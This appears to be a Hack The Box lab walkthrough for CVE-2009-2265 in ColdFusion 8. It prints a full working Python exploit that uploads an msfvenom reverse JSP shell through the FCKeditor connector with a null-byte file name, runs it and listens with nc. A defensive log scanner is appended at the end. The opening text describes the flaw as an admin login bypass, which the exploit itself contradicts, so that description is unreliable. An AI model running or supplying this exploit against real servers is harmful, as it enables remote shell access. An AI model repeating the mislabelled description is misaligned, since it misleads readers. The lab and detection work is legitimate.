CVE-2009-2265


The vulnerability is caused by a flaw in the way ColdFusion handles certain types of requests to the Administrator interface. Specifically, it allows an attacker to bypass the authentication mechanism by sending a specially crafted request to the Administrator login page. This request tricks ColdFusion into thinking that the user is already authenticated, even though they have not actually provided valid login credentials.

Once the attacker has bypassed the authentication mechanism, they can access the ColdFusion Administrator interface and perform various administrative tasks, such as modifying server settings, creating new users, and accessing sensitive information stored on the server.

Exploit


┌──(kali㉿kali)-[~/archive/htb/labs/arctic]
└─$ searchsploit -m cfm/webapps/50057.py ; mv 50057.py CVE-2009-2265.py
  Exploit: Adobe ColdFusion 8 - Remote Command Execution (RCE)
      URL: https://www.exploit-db.com/exploits/50057
     Path: /usr/share/exploitdb/exploits/cfm/webapps/50057.py
    Codes: CVE-2009-2265
 Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/archive/htb/labs/arctic/50057.py

The exploit was found locally with searchsploit and copied into the working directory.

┌──(kali㉿kali)-[~/archive/htb/labs/arctic]
└─$ cat CVE-2009-2265.py
#!/usr/bin/python3
# Exploit Title: Adobe ColdFusion 8 - Remote Command Execution (RCE)
# Google Dork: intext:"adobe coldfusion 8"
# Date: 24/06/2021
# Exploit Author: Pergyz
# Vendor Homepage: https://www.adobe.com/sea/products/coldfusion-family.html
# Version: 8
# Tested on: Microsoft Windows Server 2008 R2 Standard
# CVE : CVE-2009-2265
 
from multiprocessing import Process
import io
import mimetypes
import os
import urllib.request
import uuid
 
class MultiPartForm:
    """Builds a multipart/form-data body holding the file(s) to upload."""
 
    def __init__(self):
        self.files = []
        self.boundary = uuid.uuid4().hex.encode('utf-8')
 
    def get_content_type(self):
        return 'multipart/form-data; boundary={}'.format(self.boundary.decode('utf-8'))
 
    def add_file(self, fieldname, filename, fileHandle, mimetype=None):
        body = fileHandle.read()
 
        if mimetype is None:
            mimetype = (mimetypes.guess_type(filename)[0] or 'application/octet-stream')
 
        self.files.append((fieldname, filename, mimetype, body))
 
    @staticmethod
    def _attached_file(name, filename):
        # Part header carrying the field name and the file name declared by the caller
        return (f'Content-Disposition: form-data; name="{name}"; filename="{filename}"\r\n').encode('utf-8')
 
    @staticmethod
    def _content_type(ct):
        return 'Content-Type: {}\r\n'.format(ct).encode('utf-8')
 
    def __bytes__(self):
        buffer = io.BytesIO()
        boundary = b'--' + self.boundary + b'\r\n'
 
        for f_name, filename, f_content_type, body in self.files:
            buffer.write(boundary)
            buffer.write(self._attached_file(f_name, filename))
            buffer.write(self._content_type(f_content_type))
            buffer.write(b'\r\n')
            buffer.write(body)
            buffer.write(b'\r\n')
 
        buffer.write(b'--' + self.boundary + b'--\r\n')
        return buffer.getvalue()
 
def execute_payload():
    # Requesting the uploaded JSP makes the server execute it
    print('\nExecuting the payload...')
    print(urllib.request.urlopen(f'http://{rhost}:{rport}/userfiles/file/{filename}.jsp').read().decode('utf-8'))
 
def listen_connection():
    print('\nListening for connection...')
    os.system(f'nc -nlvp {lport}')
 
if __name__ == '__main__':
    # Define some information
    lhost = '10.10.14.5'
    lport = 9998
    rhost = "10.10.10.11"
    rport = 8500
    filename = uuid.uuid4().hex
 
    # Generate a payload that connects back and spawns a command shell
    print("\nGenerating a payload...")
    os.system(f'msfvenom -p java/jsp_shell_reverse_tcp LHOST={lhost} LPORT={lport} -o {filename}.jsp')
 
    # Encode the form data (the part is declared as a .txt file)
    form = MultiPartForm()
    with open(filename + '.jsp', 'rb') as fh:
        form.add_file('newfile', filename + '.txt', fileHandle=fh)
    data = bytes(form)
 
    # Create a request to the FCKeditor upload connector; the stored name is taken from CurrentFolder
    request = urllib.request.Request(f'http://{rhost}:{rport}/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/{filename}.jsp%00', data=data)
    request.add_header('Content-type', form.get_content_type())
    request.add_header('Content-length', str(len(data)))
 
    # Print the request
    print('\nPrinting request...')
 
    for name, value in request.header_items():
        print(f'{name}: {value}')
 
    print('\n' + request.data.decode('utf-8'))
 
    # Send the request and print the response
    print('\nSending request and printing response...')
    print(urllib.request.urlopen(request).read().decode('utf-8'))
 
    # Print some information
    print('\nPrinting some information for debugging...')
    print(f'lhost: {lhost}')
    print(f'lport: {lport}')
    print(f'rhost: {rhost}')
    print(f'rport: {rport}')
    print(f'payload: {filename}.jsp')
 
    # Delete the local copy of the payload
    print("\nDeleting the payload...")
    os.remove(f'{filename}.jsp')
 
    # Listen for connections and execute the payload
    p1 = Process(target=listen_connection)
    p1.start()
    p2 = Process(target=execute_payload)
    p2.start()
    p1.join()
    p2.join()

The exploit script contains the whole package: the payload (a Java reverse shell generated with msfvenom), the upload request to the FCKeditor connector, and a listener.
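A defender-side check, added here and not part of the original post or the exploit script: it scans web-server log lines for the two request shapes the script above produces, the FileUpload POST to the FCKeditor connector with a null-byte-terminated `.jsp` name in CurrentFolder, and the later GET of that file under /userfiles/file/. The log format and the sample lines are constructed for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Paths taken from the exploit script above.
CONNECTOR = "/cfide/scripts/ajax/fckeditor/editor/filemanager/connectors/cfm/upload.cfm"
UPLOAD_DIR = "/userfiles/file/"
EXEC_EXT = (".jsp", ".cfm", ".cfml", ".cfc")  # extensions the server will execute

# Combined-log-style line: ip ident user [ts] "METHOD URL PROTO" status size (constructed format)
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d{3})')

def check_request(method, url):
    """Return the reasons a request matches the CVE-2009-2265 upload pattern ([] if none)."""
    parts = urlsplit(url)
    path = parts.path.lower()
    reasons = []
    if path.endswith(CONNECTOR):
        qs = parse_qs(parts.query, keep_blank_values=True)  # decodes %00 to "\x00"
        if method.upper() == "POST" and qs.get("Command", [""])[0] == "FileUpload":
            reasons.append("FileUpload via FCKeditor connector")
        folder = qs.get("CurrentFolder", [""])[0]
        if "\x00" in folder:
            reasons.append("null byte in CurrentFolder")
        if folder.split("\x00")[0].lower().endswith(EXEC_EXT):
            reasons.append("server-executable extension in CurrentFolder")
    elif path.startswith(UPLOAD_DIR) and path.endswith(EXEC_EXT):
        reasons.append("server-executable file requested from upload directory")
    return reasons

def scan_log(lines):
    """Return (client_ip, url, reasons) for each log line that matches."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            reasons = check_request(m["method"], m["url"])
            if reasons:
                hits.append((m["ip"], m["url"], reasons))
    return hits

# Constructed sample: the upload, the follow-up execution, and a benign admin request.
SAMPLE_LOG = [
    '10.10.14.5 - - [24/Jun/2021:10:00:00 +0000] "POST /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/abc123.jsp%00 HTTP/1.1" 200 512',
    '10.10.14.5 - - [24/Jun/2021:10:00:01 +0000] "GET /userfiles/file/abc123.jsp HTTP/1.1" 200 128',
    '10.10.14.7 - - [24/Jun/2021:10:00:02 +0000] "GET /CFIDE/administrator/index.cfm HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for ip, url, reasons in scan_log(SAMPLE_LOG):
        print(f"{ip} {url}\n    " + "; ".join(reasons))
```

Any hit on the connector with a null byte or an executable extension in CurrentFolder is worth an alert on its own; a following GET of a `.jsp` under /userfiles/file/ from the same client confirms the upload was reached.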